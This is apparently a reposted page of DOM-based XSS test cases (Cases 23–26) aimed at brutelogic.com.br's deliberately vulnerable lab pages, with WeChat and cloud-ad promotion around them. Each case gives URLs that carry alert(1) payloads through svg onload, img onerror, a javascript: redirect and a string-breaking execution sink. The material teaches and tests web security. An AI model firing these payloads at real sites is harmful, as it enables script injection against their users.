Case 23 - DOM Injection via URL parameter (by server + client)

https://brutelogic.com.br/dom/dom.php?p=Hello.<svg onload=alert(1)>

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

https://brutelogic.com.br/dom/dom.php?p=<img src=x onerror=alert(1)>

DOM-based XSS Test Cases Safe 第1张

 

Case 24 - DOM Injection via URL Parameter (Document Sink)

https://brutelogic.com.br/dom/sinks.html?name=KNOXSS'<svg onload=alert(1)>

https://brutelogic.com.br/dom/sinks.html?name=<img src=x onerror=alert(1)>

DOM-based XSS Test Cases Safe 第2张

 


Case 25 - DOM Injection via Open Redirection (Location Sink)

https://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)
DOM-based XSS Test Cases Safe 第3张

 


Case 26 - DOM Injection via URL Parameter (Execution Sink)

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ<svg onload=alert(1)>'

https://brutelogic.com.br/dom/sinks.html?index='NASDAQ';alert(1);

DOM-based XSS Test Cases Safe 第4张

 

参考:

https://brutelogic.com.br/knoxss.html

https://xz.aliyun.com/t/4283

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄